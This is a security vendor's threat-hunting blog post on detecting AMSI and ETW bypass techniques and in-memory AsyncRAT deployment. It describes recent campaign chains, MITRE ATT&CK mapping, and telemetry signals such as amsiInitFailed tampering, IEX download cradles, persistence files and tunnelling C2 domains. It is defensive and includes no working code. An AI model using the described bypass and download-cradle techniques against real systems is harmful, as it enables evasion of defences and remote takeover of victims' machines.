Threat Hunting

Threat Hunting - Detecting AMSI Bypass and AsyncRAT Deployment

Robert Norberg
Apr 8, 2025

In our previous blog post, we followed a sophisticated threat hunting approach where we explained how the threat hunter goes looking for advanced persistent threats which is way beyond what an ordinary SIEM alert can do. Here at SofectaLabs, we utilize AI, automation, and human creativity to find hidden detection gaps that other systems ignore due to rigid rules. In this post, I will discuss in detail on how our approach works in practice and what it looks like in the field. We will provide some examples, describe the supporting technologies, and outline our processes for defining suspicions so that action can be taken before an attacker inflicts significant damage.

This post presents a technical dive into the AMSI bypass techniques and AsyncRAT deployment through MITRE ATT&CK, combining a look at detection and the visual elements tailored for professional threat hunters.

Fileless Attack Chains: AMSI/ETW Evasion and In-Memory AsyncRAT Deployment

Recent threat campaigns have increasingly leveraged AsyncRAT, an open-source C# remote access trojan, using AMSI (Antimalware Scan Interface) bypass techniques to evade detection. In early 2025, attackers used anime-themed .LNK shortcut files (e.g., “sasuke wallpaper.lnk”) to lure users. Clicking the file triggered obfuscated PowerShell scripts that loaded additional payloads into memory, leaving minimal forensic traces. The final stage deployed AsyncRAT, granting attackers remote access to the victim's machine.

A notable technique involves using the Null-AMSI tool, which disables both AMSI and ETW (Event Tracing for Windows), allowing PowerShell scripts and memory-based loaders to operate without triggering antivirus or logging. 

Similar tactics were observed in other concurrent campaigns, including one analyzed by SonicWall, where a VBScript dropper led to an AMSI bypass script downloaded from 0x0.st and ultimately executed a RAT payload, either Remcos or AsyncRAT.

These campaigns reflect a growing trend of fileless, in-memory malware execution, where attackers systematically bypass built-in Windows defenses. A typical attack chain includes:

AMSI Bypass and AsyncRAT attack flow

By operating entirely in memory and suppressing system monitoring, these campaigns achieve stealth, persistence, and command-and-control communications with little to no antivirus detection.

Hypothesis-Driven threat hunting and MITRE ATT&CK

Adversaries may attempt to bypass AMSI by injecting a null parameter (e.g., amsiInitFailed) using a PowerShell script, and then deploy AsyncRAT to gain persistence and remote control over the compromised system.

To understand how this behavior can be observed in practice, we’ve mapped the attack chain using the MITRE ATT&CK framework. Rather than providing specific detection queries, we highlight key telemetry points and artifacts that can serve as investigation starting points.

In modern cybersecurity, hypothesis-driven threat hunting has become essential to uncover advanced persistent threats (APTs) that bypass traditional security controls. By formulating targeted hypotheses based on emerging tactics, techniques, and procedures (TTPs), defenders can detect stealthy activity, improve visibility, and strengthen detection engineering.

Attack Matrix for AsyncRAT

Detecting AMSI Bypass and AsyncRAT Activity

While AMSI bypass techniques are designed to avoid detection, they inevitably leave subtle traces in system telemetry. By correlating these traces, threat hunters can identify the full attack chain — from initial script execution to in-memory payload deployment and command-and-control (C2) communication.

Key telemetry signals include:

  • PowerShell Operational Logs (Event ID 4103/4104): If Script Block Logging is enabled, analysts can capture suspicious script patterns such as reflective access to AmsiUtils, manipulation of amsiInitFailed, or raw memory operations like VirtualProtect or Marshal::Copy. These often appear obfuscated, but even partial matches or Base64-encoded blobs combined with binary logic can warrant further investigation.
  • Process Creation Events (Sysmon Event ID 1 / Windows EID 4688): Look for PowerShell executions with -ExecutionPolicy Bypass, Invoke-WebRequest, or embedded IEX commands pulling scripts from external sources like 0x0.st or GitHub’s raw content URLs. These patterns are common in AMSI bypass download cradles.
  • Memory Modification and DLL Loading: AMSI bypass often includes in-memory patching of amsi.dll. If advanced EDR or Sysmon is configured, memory tampering (Sysmon EID 10) within PowerShell or related script hosts can indicate in-process patching. In some cases, AsyncRAT variants inject into trusted processes like aspnet_compiler.exe, which may also be detected via unusual parent-child process relationships.
  • Persistence Artifacts: Once deployed, AsyncRAT often establishes persistence via startup scripts or scheduled tasks. Look for files like StartupScript_<random>.ps1 or dwm.bat in startup folders, or task creation events (Windows EID 4698) triggering PowerShell or batch script execution. These artifacts are rare in normal user behavior and often signal malware staging.
  • C2 Communication and Network Activity: Although AsyncRAT’s traffic is usually encrypted (SSL/TLS), destination analysis can reveal anomalies. Campaigns have been observed using TryCloudflare tunnels (e.g., subdomains of cfargotunnel.com) to disguise beaconing. DNS and proxy logs can help link suspicious outbound traffic back to script execution timelines.

By piecing together these telemetry indicators, defenders can reconstruct a comprehensive picture of malicious activity. An AMSI bypass may start with a PowerShell script, lead to memory patching, establish persistence, and eventually result in encrypted C2 traffic—each step leaving behind a footprint. Recognizing and correlating these signals is key to identifying stealthy threats like AsyncRAT.

In a Nutshell: Detecting AMSI Bypass and AsyncRAT via Hypothesis-Driven Hunting

This article explains how hypothesis-driven threat hunting can reveal stealthy threats like AMSI bypass techniques and the deployment of AsyncRAT malware that operates in memory and evades traditional security controls.

The core hypothesis is that attackers may attempt to disable AMSI by injecting a null parameter, then use PowerShell to deploy AsyncRAT for persistence and remote control over compromised systems.

Detection focuses on identifying subtle signs left in telemetry, including:

  • PowerShell logs showing indicators like amsiInitFailed, null, or Bypass

  • Process relationships where PowerShell launches AsyncRAT

  • Registry keys or mutexes indicating malware persistence

  • DNS queries to known dynamic DNS domains, such as duckdns.org or no-ip.com

These signals provide crucial breadcrumbs, but how do we turn them into scalable, actionable detection logic?

Stay tuned: in a follow-up blogpost, we’ll dive into how we use Elastic Search and ES|QL to operationalize these insights and build efficient hunting workflows.

Read more similar posts
Threat Hunting
Apr 8

Threat Hunting - Detecting AMSI Bypass and AsyncRAT Deployment

Threat Hunting
Mar 7

Threat Hunting – Hypothesis-Driven Threat Hunting

Solutions
Managed Detection and ResponseManaged ObservabilitySecurity Consulting
Company
Contact UsAbout UsCareers
Resources
Blog
Subscribe
Join our newsletter to stay up to date on features and releases.
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
© 2024 Sofecta. All rights reserved.
Privacy
Cookie Consent

By clicking “Accept”, you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.
Manage Cookies

deny icon
Deny
allow icon
Accept